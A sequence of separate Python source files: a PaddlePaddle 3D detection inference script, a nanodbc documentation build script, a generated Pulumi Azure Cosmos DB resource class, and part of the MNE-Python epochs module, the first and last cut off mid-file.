img = img.transpose(2, 0, 1)
img = img[None,:,:,:]
return img, ori_img_size, output_size
def init_predictor(args):
if args.model_dir is not "":
config = Config(args.model_dir)
else:
config = Config(args.model_file, args.params_file)
config.enable_memory_optim()
if args.use_gpu:
config.enable_use_gpu(1000, 0)
else:
# If not specific mkldnn, you can set the blas thread.
# The thread num should not be greater than the number of cores in the CPU.
config.set_cpu_math_library_num_threads(4)
config.enable_mkldnn()
predictor = create_predictor(config)
return predictor
def run(predictor, img):
# copy img data to input tensor
input_names = predictor.get_input_names()
for i, name in enumerate(input_names):
input_tensor = predictor.get_input_handle(name)
input_tensor.reshape(img[i].shape)
input_tensor.copy_from_cpu(img[i].copy())
# do the inference
predictor.run()
results = []
# get out data from output tensor
output_names = predictor.get_output_names()
for i, name in enumerate(output_names):
output_tensor = predictor.get_output_handle(name)
output_data = output_tensor.copy_to_cpu()
results.append(output_data)
return results
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--model_file",
type=str,
default="./inference.pdmodel",
help="Model filename, Specify this when your model is a combined model."
)
parser.add_argument(
"--params_file",
type=str,
default="./inference.pdiparams",
help=
"Parameter filename, Specify this when your model is a combined model."
)
parser.add_argument(
"--model_dir",
type=str,
default="",
help=
"Model dir, If you load a non-combined model, specify the directory of the model."
)
parser.add_argument(
'--input_path',
dest='input_path',
help='The image path',
type=str,
required=True)
parser.add_argument(
'--output_path',
dest='output_path',
help='The result path of image',
type=str,
required=True)
parser.add_argument("--use_gpu",
type=int,
default=0,
help="Whether use gpu.")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
pred = init_predictor(args)
K = np.array([[[2055.56, 0, 939.658], [0, 2055.56, 641.072], [0, 0, 1]]], np.float32)
K_inverse = np.linalg.inv(K)
img_path = args.input_path
img, ori_img_size, output_size = get_img(img_path)
ratio = get_ratio(ori_img_size, output_size)
results = run(pred, [img, K_inverse, ratio])
total_pred = paddle.to_tensor(results[0])
keep_idx = paddle.nonzero(total_pred[:, -1] > 0.25)
total_pred = paddle.gather(total_pred, keep_idx)
if total_pred.shape[0] > 0:
pred_dimensions = total_pred[:, 6:9]
pred_dimensions = pred_dimensions.roll(shifts=1, axis=1)
pred_rotys = total_pred[:, 12]
pred_locations = total_pred[:, 9:12]
bbox_3d = encode_box3d(pred_rotys, pred_dimensions, pred_locations, paddle.to_tensor(K), (1280, 1920))
else:
bbox_3d = total_pred
img_draw = cv2.imread(img_path)
for idx in range(bbox_3d.shape[0]):
bbox = bbox_3d[idx]
bbox = bbox.transpose([1,0]).numpy()
img_draw = draw_box_3d(img_draw, bbox)
cv2.imwrite(args.output_path, img_draw)
|
# Build the documentation for nanodbc library
# Configuration
nanodbc_name = 'nanodbc'
nanodbc_versions = ['master', '2.13.0']
# End of Configuration
import errno
import os
import sys
from subprocess import check_call, CalledProcessError, Popen, PIPE
def build_docs(**kwargs):
assert nanodbc_versions
version = kwargs.get('version', nanodbc_versions[0])
doc_dir = kwargs.get('doc_dir', os.path.dirname(
os.path.realpath(__file__)))
work_dir = kwargs.get('work_dir', '.')
include_dir = kwargs.get('include_dir', os.path.join(
os.path.dirname(doc_dir), 'nanodbc'))
doxyxml_dir = os.path.join(work_dir, 'doxyxml')
doxyfile = r'''
PROJECT_NAME = {0}
GENERATE_XML = YES
GENERATE_HTML = NO
GENERATE_LATEX = NO
INPUT = {1}
JAVADOC_AUTOBRIEF = YES
AUTOLINK_SUPPORT = NO
XML_OUTPUT = {2}
MACRO_EXPANSION = YES
PREDEFINED = DOXYGEN=1
'''.format(nanodbc_name, include_dir, doxyxml_dir).encode('UTF-8')
cmd = ['doxygen', '-']
p = Popen(cmd, stdin=PIPE)
p.communicate(input=doxyfile)
if p.returncode != 0:
raise CalledProcessError(p.returncode, cmd)
sys.exit()
html_dir = os.path.join(work_dir, 'html')
versions = nanodbc_versions
assert versions
check_call(['sphinx-build',
'-Dbreathe_projects.format=' + os.path.abspath(doxyxml_dir),
'-Dversion=' + version, '-Drelease=' + version,
'-Aversion=' + version, '-Aversions=' + ','.join(versions),
'-b', 'html', doc_dir, html_dir])
try:
check_call(['lessc', '--clean-css',
'--include-path=' + os.path.join(doc_dir, 'bootstrap'),
os.path.join(doc_dir, 'nanodbc.less'),
os.path.join(html_dir, '_static', 'nanodbc.css')])
except OSError as err:
if err.errno != errno.ENOENT:
raise
print('lessc (http://lesscss.org/) not found')
sys.exit(1)
return html_dir
if __name__ == '__main__':
#create_build_env()
build_docs()
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['SqlResourceSqlStoredProcedure']
class SqlResourceSqlStoredProcedure(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
container_name: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[pulumi.InputType['CreateUpdateOptionsArgs']]] = None,
resource: Optional[pulumi.Input[pulumi.InputType['SqlStoredProcedureResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
stored_procedure_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
An Azure Cosmos DB storedProcedure.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: Cosmos DB database account name.
:param pulumi.Input[str] container_name: Cosmos DB container name.
:param pulumi.Input[str] database_name: Cosmos DB database name.
:param pulumi.Input[str] location: The location of the resource group to which the resource belongs.
:param pulumi.Input[pulumi.InputType['CreateUpdateOptionsArgs']] options: A key-value pair of options to be applied for the request. This corresponds to the headers sent with the request.
:param pulumi.Input[pulumi.InputType['SqlStoredProcedureResourceArgs']] resource: The standard JSON format of a storedProcedure
:param pulumi.Input[str] resource_group_name: Name of an Azure resource group.
:param pulumi.Input[str] stored_procedure_name: Cosmos DB storedProcedure name.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__['account_name'] = account_name
if container_name is None and not opts.urn:
raise TypeError("Missing required property 'container_name'")
__props__['container_name'] = container_name
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__['database_name'] = database_name
__props__['location'] = location
if options is None and not opts.urn:
raise TypeError("Missing required property 'options'")
__props__['options'] = options
if resource is None and not opts.urn:
raise TypeError("Missing required property 'resource'")
__props__['resource'] = resource
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['stored_procedure_name'] = stored_procedure_name
__props__['tags'] = tags
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:documentdb/v20191212:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/latest:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/latest:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20190801:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20190801:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200301:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200301:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200401:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200401:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200601preview:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200601preview:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200901:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200901:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20210115:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20210115:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20210301preview:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20210301preview:SqlResourceSqlStoredProcedure")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlResourceSqlStoredProcedure, __self__).__init__(
'azure-native:documentdb/v20191212:SqlResourceSqlStoredProcedure',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlResourceSqlStoredProcedure':
"""
Get an existing SqlResourceSqlStoredProcedure resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["location"] = None
__props__["name"] = None
__props__["resource"] = None
__props__["tags"] = None
__props__["type"] = None
return SqlResourceSqlStoredProcedure(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
The location of the resource group to which the resource belongs.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the ARM resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def resource(self) -> pulumi.Output[Optional['outputs.SqlStoredProcedureGetPropertiesResponseResource']]:
return pulumi.get(self, "resource")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of Azure resource.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
"""Tools for working with epoched data"""
# Authors: Alexandre Gramfort <gramfort@nmr.mgh.harvard.edu>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Daniel Strohmeier <daniel.strohmeier@tu-ilmenau.de>
# Denis Engemann <d.engemann@fz-juelich.de>
# Mainak Jas <mainak@neuro.hut.fi>
#
# License: BSD (3-clause)
from .externals.six import string_types
import copy as cp
import warnings
import json
import numpy as np
from .fiff.write import (start_file, start_block, end_file, end_block,
write_int, write_float_matrix, write_float,
write_id, write_string)
from .fiff.meas_info import read_meas_info, write_meas_info
from .fiff.open import fiff_open
from .fiff.raw import _time_as_index, _index_as_time, Raw
from .fiff.tree import dir_tree_find
from .fiff.tag import read_tag
from .fiff import Evoked, FIFF
from .fiff.pick import (pick_types, channel_indices_by_type, channel_type,
pick_channels, pick_info)
from .fiff.proj import setup_proj, ProjMixin
from .fiff.channels import ContainsMixin, DropChannelsMixin
from .fiff.evoked import aspect_rev
from .baseline import rescale
from .utils import (check_random_state, _check_pandas_index_arguments,
_check_pandas_installed)
from .filter import resample, detrend
from .event import _read_events_fif
from .fixes import in1d
from .viz import _mutable_defaults, plot_epochs
from .utils import logger, verbose
from .externals import six
from .externals.six.moves import zip
from .utils import deprecated
class _BaseEpochs(ProjMixin, ContainsMixin, DropChannelsMixin):
"""Abstract base class for Epochs-type classes
This class provides basic functionality and should never be instantiated
directly. See Epochs below for an explanation of the parameters.
"""
def __init__(self, info, event_id, tmin, tmax, baseline=(None, 0),
picks=None, name='Unknown', reject=None, flat=None,
decim=1, reject_tmin=None, reject_tmax=None, detrend=None,
add_eeg_ref=True, verbose=None):
self.verbose = verbose
self.name = name
if isinstance(event_id, dict):
if not all([isinstance(v, int) for v in event_id.values()]):
raise ValueError('Event IDs must be of type integer')
if not all([isinstance(k, string_types) for k in event_id]):
raise ValueError('Event names must be of type str')
self.event_id = event_id
elif isinstance(event_id, list):
if not all([isinstance(v, int) for v in event_id]):
raise ValueError('Event IDs must be of type integer')
self.event_id = dict(zip((str(i) for i in event_id), event_id))
elif isinstance(event_id, int):
self.event_id = {str(event_id): event_id}
else:
raise ValueError('event_id must be dict or int.')
# check reject_tmin and reject_tmax
if (reject_tmin is not None) and (reject_tmin < tmin):
raise ValueError("reject_tmin needs to be None or >= tmin")
if (reject_tmax is not None) and (reject_tmax > tmax):
raise ValueError("reject_tmax needs to be None or <= tmax")
if (reject_tmin is not None) and (reject_tmax is not None):
if reject_tmin >= reject_tmax:
raise ValueError('reject_tmin needs to be < reject_tmax')
if not detrend in [None, 0, 1]:
raise ValueError('detrend must be None, 0, or 1')
# check that baseline is in available data
if baseline is not None:
baseline_tmin, baseline_tmax = baseline
tstep = 1. / info['sfreq']
if baseline_tmin is not None:
if baseline_tmin < tmin - tstep:
err = ("Baseline interval (tmin = %s) is outside of epoch "
"data (tmin = %s)" % (baseline_tmin, tmin))
raise ValueError(err)
if baseline_tmax is not None:
if baseline_tmax > tmax + tstep:
err = ("Baseline interval (tmax = %s) is outside of epoch "
"data (tmax = %s)" % (baseline_tmax, tmax))
raise ValueError(err)
self.tmin = tmin
self.tmax = tmax
self.baseline = baseline
self.reject = reject
self.reject_tmin = reject_tmin
self.reject_tmax = reject_tmax
self.flat = flat
self.decim = decim = int(decim)
self._bad_dropped = False
self.drop_log = None
self.selection = None
self.detrend = detrend
# Handle measurement info
self.info = info
if picks is None:
picks = list(range(len(self.info['ch_names'])))
else:
self.info['chs'] = [self.info['chs'][k] for k in picks]
self.info['ch_names'] = [self.info['ch_names'][k] for k in picks]
self.info['nchan'] = len(picks)
self.picks = picks
if len(picks) == 0:
raise ValueError("Picks cannot be empty.")
# Handle times
if tmin >= tmax:
raise ValueError('tmin has to be smaller than tmax')
sfreq = float(self.info['sfreq'])
n_times_min = int(round(tmin * sfreq))
n_times_max = int(round(tmax * sfreq))
times = np.arange(n_times_min, n_times_max + 1, dtype=np.float) / sfreq
self.times = times
self._raw_times = times # times before decimation
self._epoch_stop = ep_len = len(self.times)
if decim > 1:
new_sfreq = sfreq / decim
lowpass = self.info['lowpass']
if new_sfreq < 2.5 * lowpass: # nyquist says 2 but 2.5 is safer
msg = ('The measurement information indicates a low-pass '
'frequency of %g Hz. The decim=%i parameter will '
'result in a sampling frequency of %g Hz, which can '
'cause aliasing artifacts.'
% (lowpass, decim, new_sfreq))
warnings.warn(msg)
i_start = n_times_min % decim
self._decim_idx = slice(i_start, ep_len, decim)
self.times = self.times[self._decim_idx]
self.info['sfreq'] = new_sfreq
self.preload = False
self._data = None
self._offset = None
# setup epoch rejection
self._reject_setup()
def _reject_setup(self):
"""Sets self._reject_time and self._channel_type_idx (called from
__init__)
"""
if self.reject is None and self.flat is None:
return
idx = channel_indices_by_type(self.info)
for key in idx.keys():
if (self.reject is not None and key in self.reject) \
or (self.flat is not None and key in self.flat):
if len(idx[key]) == 0:
raise ValueError("No %s channel found. Cannot reject based"
" on %s." % (key.upper(), key.upper()))
self._channel_type_idx = idx
if (self.reject_tmin is None) and (self.reject_tmax is None):
self._reject_time = None
else:
if self.reject_tmin is None:
reject_imin = None
else:
idxs = np.nonzero(self.times >= self.reject_tmin)[0]
reject_imin = idxs[0]
if self.reject_tmax is None:
reject_imax = None
else:
idxs = np.nonzero(self.times <= self.reject_tmax)[0]
reject_imax = idxs[-1]
self._reject_time = slice(reject_imin, reject_imax)
@verbose
def _is_good_epoch(self, data, verbose=None):
"""Determine if epoch is good"""
if data is None:
return False, ['NO_DATA']
n_times = len(self.times)
if data.shape[1] < n_times:
# epoch is too short ie at the end of the data
return False, ['TOO_SHORT']
if self.reject is None and self.flat is None:
return True, None
else:
if self._reject_time is not None:
data = data[:, self._reject_time]
return _is_good(data, self.ch_names, self._channel_type_idx,
self.reject, self.flat, full_report=True,
ignore_chs=self.info['bads'])
def get_data(self):
"""Get all epochs as a 3D array
Returns
-------
data : array of shape [n_epochs, n_channels, n_times]
The epochs data
"""
if self.preload:
return self._data
else:
data = self._get_data_from_disk()
return data
def iter_evoked(self):
"""Iterate over Evoked objects with nave=1
"""
self._current = 0
while True:
evoked = Evoked(None)
evoked.info = cp.deepcopy(self.info)
evoked.times = self.times.copy()
evoked.nave = 1
evoked.first = int(self.times[0] * self.info['sfreq'])
evoked.last = evoked.first + len(self.times) - 1
evoked.data, event_id = self.next(True)
evoked.comment = str(event_id)
yield evoked
def subtract_evoked(self, evoked=None):
"""Subtract an evoked response from each epoch
Can be used to exclude the evoked response when analyzing induced
activity, see e.g. [1].
References
----------
[1] David et al. "Mechanisms of evoked and induced responses in
MEG/EEG", NeuroImage, vol. 31, no. 4, pp. 1580-1591, July 2006.
Parameters
----------
evoked : instance of mne.fiff.Evoked | None
The evoked response to subtract. If None, the evoked response
is computed from Epochs itself.
Returns
-------
self : instance of mne.Epochs
The modified instance (instance is also modified inplace).
"""
logger.info('Subtracting Evoked from Epochs')
if evoked is None:
picks = pick_types(self.info, meg=True, eeg=True,
stim=False, eog=False, ecg=False,
emg=False, exclude=[])
evoked = self.average(picks)
# find the indices of the channels to use
picks = pick_channels(evoked.ch_names, include=self.ch_names)
# make sure the omitted channels are not data channels
if len(picks) < len(self.ch_names):
sel_ch = [evoked.ch_names[ii] for ii in picks]
diff_ch = list(set(self.ch_names).difference(sel_ch))
diff_idx = [self.ch_names.index(ch) for ch in diff_ch]
diff_types = [channel_type(self.info, idx) for idx in diff_idx]
bad_idx = [diff_types.index(t) for t in diff_types if t in
['grad', 'mag', 'eeg']]
if len(bad_idx) > 0:
bad_str = ', '.join([diff_ch[ii] for ii in bad_idx])
raise ValueError('The following data channels are missing '
'in the evoked response: %s' % bad_str)
logger.info(' The following channels are not included in the '
'subtraction: %s' % ', '.join(diff_ch))
# make sure the times match
if (len(self.times) != len(evoked.times) or
np.max(np.abs(self.times - evoked.times)) >= 1e-7):
raise ValueError('Epochs and Evoked object do not contain '
'the same time points.')
# handle SSPs
if not self.proj and evoked.proj:
warnings.warn('Evoked has SSP applied while Epochs has not.')
if self.proj and not evoked.proj:
evoked = evoked.copy().apply_proj()
# find the indices of the channels to use in Epochs
ep_picks = [self.ch_names.index(evoked.ch_names[ii]) for ii in picks]
# do the subtraction
if self.preload:
self._data[:, ep_picks, :] -= evoked.data[picks][None, :, :]
else:
if self._offset is None:
self._offset = np.zeros((len(self.ch_names), len(self.times)),
dtype=np.float)
self._offset[ep_picks] -= evoked.data[picks]
logger.info('[done]')
return self
def _get_data_from_disk(self, out=True, verbose=None):
raise NotImplementedError('_get_data_from_disk() must be implemented '
'in derived class.')
def __iter__(self):
"""To make iteration over epochs easy.
"""
self._current = 0
return self
def next(self, return_event_id=False):
raise NotImplementedError('next() must be implemented in derived '
'class.')
def __next__(self, *args, **kwargs):
"""Wrapper for Py3k"""
return self.next(*args, **kwargs)
def average(self, picks=None):
"""Compute average of epochs
Parameters
----------
picks : None | array of int
If None only MEG and EEG channels are kept
otherwise the channels indices in picks are kept.
Returns
-------
evoked : Evoked instance
The averaged epochs
"""
return self._compute_mean_or_stderr(picks, 'ave')
def standard_error(self, picks=None):
"""Compute standard error over epochs
Parameters
----------
picks : None | array of int
If None only MEG and EEG channels are kept
otherwise the channels indices in picks are kept.
Returns
-------
evoked : Evoked instance
The standard error over epochs
"""
return self._compute_mean_or_stderr(picks, 'stderr')
def _compute_mean_or_stderr(self, picks, mode='ave'):
"""Compute the mean or std over epochs and return Evoked"""
_do_std = True if mode == 'stderr' else False
evoked = Evoked(None)
evoked.info = cp.deepcopy(self.info)
# make sure projs are really copied.
evoked.info['projs'] = [cp.deepcopy(p) for p in self.info['projs']]
n_channels = len(self.ch_names)
n_times = len(self.times)
if self.preload:
n_events = len(self.events)
if not _do_std:
data = np.mean(self._data, axis=0)
else:
data = np.std(self._data, axis=0)
assert len(self.events) == len(self._data)
else:
data = np.zeros((n_channels, n_times))
n_events = 0
for e in self:
data += e
n_events += 1
if n_events > 0:
data /= n_events
else:
data.fill(np.nan)
# convert to stderr if requested, could do in one pass but do in
# two (slower) in case there are large numbers
if _do_std:
data_mean = cp.copy(data)
data.fill(0.)
for e in self:
data += (e - data_mean) ** 2
data = np.sqrt(data / n_events)
evoked.data = data
evoked.times = self.times.copy()
evoked.comment = self.name
evoked.nave = n_events
evoked.first = int(self.times[0] * self.info['sfreq'])
evoked.last = evoked.first + len(self.times) - 1
if not _do_std:
evoked._aspect_kind = FIFF.FIFFV_ASPECT_AVERAGE
else:
evoked._aspect_kind = FIFF.FIFFV_ASPECT_STD_ERR
evoked.data /= np.sqrt(evoked.nave)
evoked.kind = aspect_rev.get(str(evoked._aspect_kind), 'Unknown')
# dropping EOG, ECG and STIM channels. Keeping only data
if picks is None:
picks = pick_types(evoked.info, meg=True, eeg=True, ref_meg=True,
stim=False, eog=False, ecg=False,
emg=False, exclude=[])
if len(picks) == 0:
raise ValueError('No data channel found when averaging.')
picks = np.sort(picks) # make sure channel order does not change
evoked.info['chs'] = [evoked.info['chs'][k] for k in picks]
evoked.info['ch_names'] = [evoked.info['ch_names'][k]
for k in picks]
evoked.info['nchan'] = len(picks)
evoked.data = evoked.data[picks]
# otherwise the apply_proj will be confused
evoked.proj = True if self.proj is True else None
evoked.verbose = self.verbose
if evoked.nave < 1:
warnings.warn('evoked object is empty (based on less '
'than 1 epoch)', RuntimeWarning)
return evoked
@property
def ch_names(self):
return self.info['ch_names']
def plot(self, epoch_idx=None, picks=None, scalings=None,
title_str='#%003i', show=True, block=False):
""" Visualize single trials using Trellis plot.
Parameters
----------
epoch_idx : array-like | int | None
The epochs to visualize. If None, the frist 20 epochs are shoen.
Defaults to None.
picks : array-like | None
Channels to be included. If None only good data channels are used.
Defaults to None
scalings : dict | None
Scale factors for the traces. If None, defaults to:
`dict(mag=1e-12, grad=4e-11, eeg=20e-6, eog=150e-6, ecg=5e-4,
emg=1e-3, ref_meg=1e-12, misc=1e-3, stim=1, resp=1,
chpi=1e-4)`
title_str : None | str
The string formatting to use for axes titles. If None, no titles
will be shown. Defaults expand to ``#001, #002, ...``
show : bool
Whether to show the figure or not.
block : bool
Whether to halt program execution until the figure is closed.
Useful for rejecting bad trials on the fly by clicking on a
sub plot.
Returns
-------
fig : Instance of matplotlib.figure.Figure
The figure.
"""
return plot_epochs(self, epoch_idx=epoch_idx, picks=picks,
scalings=scalings, title_str=title_str,
show=show, block=block)
class Epochs(_BaseEpochs):
"""List of Epochs
Parameters
----------
raw : Raw object
An instance of Raw.
events : array, of shape [n_events, 3]
The events typically returned by the read_events function.
If some events don't match the events of interest as specified
by event_id, they will be marked as 'IGNORED' in the drop log.
event_id : int | list of int | dict | None
The id of the event to consider. If dict,
the keys can later be used to acces associated events. Example:
dict(auditory=1, visual=3). If int, a dict will be created with
the id as string. If a list, all events with the IDs specified
in the list are used. If None, all events will be used with
and a dict is created with string integer names corresponding
to the event id integers.
tmin : float
Start time before event.
tmax : float
End time after event.
name : string
Comment that describes the Evoked data created.
baseline : None or tuple of length 2 (default (None, 0))
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal to (None, None) all the time
interval is used.
The baseline (a, b) includes both endpoints, i.e. all
timepoints t such that a <= t <= b.
picks : None (default) or array of int
Indices of channels to include (if None, all channels
are used).
preload : boolean
Load all epochs from disk when creating the object
or wait before accessing each epoch (more memory
efficient but can be slower).
reject : dict
Epoch rejection parameters based on peak to peak amplitude.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'.
If reject is None then no rejection is done.
Values are float. Example::
reject = dict(grad=4000e-13, # T / m (gradiometers)
mag=4e-12, # T (magnetometers)
eeg=40e-6, # uV (EEG channels)
eog=250e-6 # uV (EOG channels)
)
flat : dict
Epoch rejection parameters based on flatness of signal
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'
If flat is None then no rejection is done.
proj : bool | 'delayed'
Apply SSP projection vectors. If proj is 'delayed' and reject is not
None the single epochs will be projected before the rejection
decision, but used in unprojected state if they are kept.
This way deciding which projection vectors are good can be postponed
to the evoked stage without resulting in lower epoch counts and
without producing results different from early SSP application
given comparable parameters. Note that in this case baselining,
detrending and temporal decimation will be postponed.
If proj is False no projections will be applied which is the
recommended value if SSPs are not used for cleaning the data.
decim : int
Factor by which to downsample the data from the raw file upon import.
Warning: This simply selects every nth sample, data is not filtered
here. If data is not properly filtered, aliasing artifacts may occur.
reject_tmin : scalar | None
Start of the time window used to reject epochs (with the default None,
the window will start with tmin).
reject_tmax : scalar | None
End of the time window used to reject epochs (with the default None,
the window will end with tmax).
detrend : int | None
If 0 or 1, the data channels (MEG and EEG) will be detrended when
loaded. 0 is a constant (DC) detrend, 1 is a linear detrend. None
is no detrending. Note that detrending is performed before baseline
correction. If no DC offset is preferred (zeroth order detrending),
either turn off baseline correction, as this may introduce a DC
shift, or set baseline correction to use the entire time interval
(will yield equivalent results but be slower).
add_eeg_ref : bool
If True, an EEG average reference will be added (unless one
already exists).
on_missing : str
What to do if an event id is not found in the recording.
Valid keys are 'error' | 'warning' | 'ignore'
Default is 'error'. If on_missing is 'warning' it will proceed but
warn, if 'ignore' it will proceed silently.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to raw.verbose.
Attributes
----------
info: dict
Measurement info.
event_id : dict
Names of of conditions corresponding to event_ids.
ch_names : list of string
List of channels' names.
selection : array
List of indices of selected events (not dropped or ignored etc.). For
example, if the original event array had 4 events and the second event
has been dropped, this attribute would be np.array([0, 2, 3]).
drop_log : list of lists
A list of the same length as the event array used to initialize the
Epochs object. If the i-th original event is still part of the
selection, drop_log[i] will be an empty list; otherwise it will be
a list of the reasons the event is not longer in the selection, e.g.:
'IGNORED' if it isn't part of the current subset defined by the user;
'NO DATA' or 'TOO SHORT' if epoch didn't contain enough data;
names of channels that exceeded the amplitude threshold;
'EQUALIZED_COUNTS' (see equalize_event_counts);
or user-defined reasons (see drop_epochs).
verbose : bool, str, int, or None
See above.
Notes
-----
For indexing and slicing:
epochs[idx] : Epochs
Return Epochs object with a subset of epochs (supports single
index and python-style slicing)
For subset selection using categorial labels:
epochs['name'] : Epochs
Return Epochs object with a subset of epochs corresponding to an
experimental condition as specified by 'name'.
epochs[['name_1', 'name_2', ... ]] : Epochs
Return Epochs object with a subset of epochs corresponding to multiple
experimental conditions as specified by 'name_1', 'name_2', ... .
See also
--------
mne.epochs.combine_event_ids
mne.Epochs.equalize_event_counts
"""
@verbose
def __init__(self, raw, events, event_id, tmin, tmax, baseline=(None, 0),
picks=None, name='Unknown', preload=False, reject=None,
flat=None, proj=True, decim=1, reject_tmin=None,
reject_tmax=None, detrend=None, add_eeg_ref=True,
on_missing='error', verbose=None):
if raw is None:
return
elif not isinstance(raw, Raw):
raise ValueError('The first argument to `Epochs` must be `None` '
'or an instance of `mne.fiff.Raw`')
if on_missing not in ['error', 'warning', 'ignore']:
raise ValueError('on_missing must be one of: error, '
'warning, ignore. Got: %s' % on_missing)
# prepare for calling the base constructor
# Handle measurement info
info = cp.deepcopy(raw.info)
# make sure projs are really copied.
info['projs'] = [cp.deepcopy(p) for p in info['projs']]
if event_id is None: # convert to int to make typing-checks happy
event_id = dict((str(e), int(e)) for e in np.unique(events[:, 2]))
proj = proj or raw.proj # proj is on when applied in Raw
# call _BaseEpochs constructor
super(Epochs, self).__init__(info, event_id, tmin, tmax,
baseline=baseline, picks=picks, name=name,
reject=reject, flat=flat, decim=decim,
reject_tmin=reject_tmin,
reject_tmax=reject_tmax, detrend=detrend,
add_eeg_ref=add_eeg_ref, verbose=verbose)
# do the rest
self.raw = raw
proj = proj or raw.proj # proj is on when applied in Raw
if proj not in [True, 'delayed', False]:
raise ValueError(r"'proj' must either be 'True', 'False' or "
"'delayed'")
self.proj = proj
if self._check_delayed():
logger.info('Entering delayed SSP mode.')
